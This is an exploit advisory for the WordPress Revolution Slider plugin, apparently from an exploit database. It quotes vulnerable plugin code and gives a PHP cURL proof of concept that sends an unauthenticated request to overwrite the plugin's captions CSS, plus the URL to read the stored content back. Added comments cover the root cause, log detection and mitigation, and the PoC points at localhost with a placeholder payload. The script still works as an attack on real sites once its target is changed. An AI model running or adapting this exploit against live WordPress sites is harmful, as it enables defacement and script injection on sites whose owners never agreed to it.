
Wordpress Plugin Revolution Slider - Unrestricted File Upload

Author: CrashBandicot , Published: 28-03-2015
######################################################################
# Exploit Title: Wordpress Plugin Revolution Slider - Unrestricted File Upload
# Google Dork: Y0ur Brain
# Date: 27.03.2015
# Exploit Author: CrashBandicot (@DosPerl)
# Vendor HomePage: http://revolution.themepunch.com/
# Version: old
# Tested on: Windows
######################################################################


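# Path of File : /wp-content/plugins/revslider/revslider_admin.php
# Vulnerable File : revslider_admin.php
# In the excerpt below, the request-supplied "data" value (line 233) is handed
# to updateCaptionsContentData() (line 306); no capability or nonce check
# appears in the quoted lines (lines 234-300 are not shown).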

232. $action = self::getPostGetVar("client_action");
233. $data = self::getPostGetVar("data");
...
301. case "get_captions_css":
302. $contentCSS = $operations->getCaptionsContent();
303. self::ajaxResponseData($contentCSS);
...
305. case "update_captions_css":
306. $arrCaptions = $operations->updateCaptionsContentData($data);
307. self::ajaxResponseSuccess("CSS file saved succesfully!",array("arrCaptions"=>$arrCaptions));


# Exploit :

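<?php

// Proof-of-concept request for a local test install (http://localhost only).
// It shows that the plugin's AJAX action "revslider_ajax_action" accepts the
// "update_captions_css" client action from a request that carries no session
// cookie and no nonce.
//
// Defender notes:
//  - Root cause: the quoted dispatcher saves request-supplied "data" without a
//    visible authorization step. A handler like this should verify a nonce
//    (check_ajax_referer) and the caller's capability (current_user_can)
//    before writing anything.
//  - Detection: look in web access logs for POSTs to /wp-admin/admin-ajax.php
//    with action=revslider_ajax_action and client_action=update_captions_css
//    from clients without an authenticated session, and review the stored
//    captions CSS for content that is not CSS.
//  - Mitigation: update the plugin to a vendor-fixed release; until then,
//    block this action for unauthenticated requests at the web server or WAF.

// Form fields read by the handler via getPostGetVar(). The "data" value is a
// harmless placeholder that stands in for attacker-controlled content.
$post = [
    "action" => "revslider_ajax_action",
    "client_action" => "update_captions_css",
    "data" => "<marquee>Malicious Code Here</marquee>",
];

$ch = curl_init("http://localhost/wp-admin/admin-ajax.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
// Certificate checks are switched off in the original PoC. They have no effect
// on a plain-http localhost URL and should not be copied into other code.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_POST, 1);
// Passing an array makes cURL send the fields as multipart/form-data.
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
// The response body is captured but not inspected by this script.
$data = curl_exec($ch);
curl_close($ch);

?>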



# Path of Result (the saved captions content is returned by the get_captions_css action): /wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css

#EOF
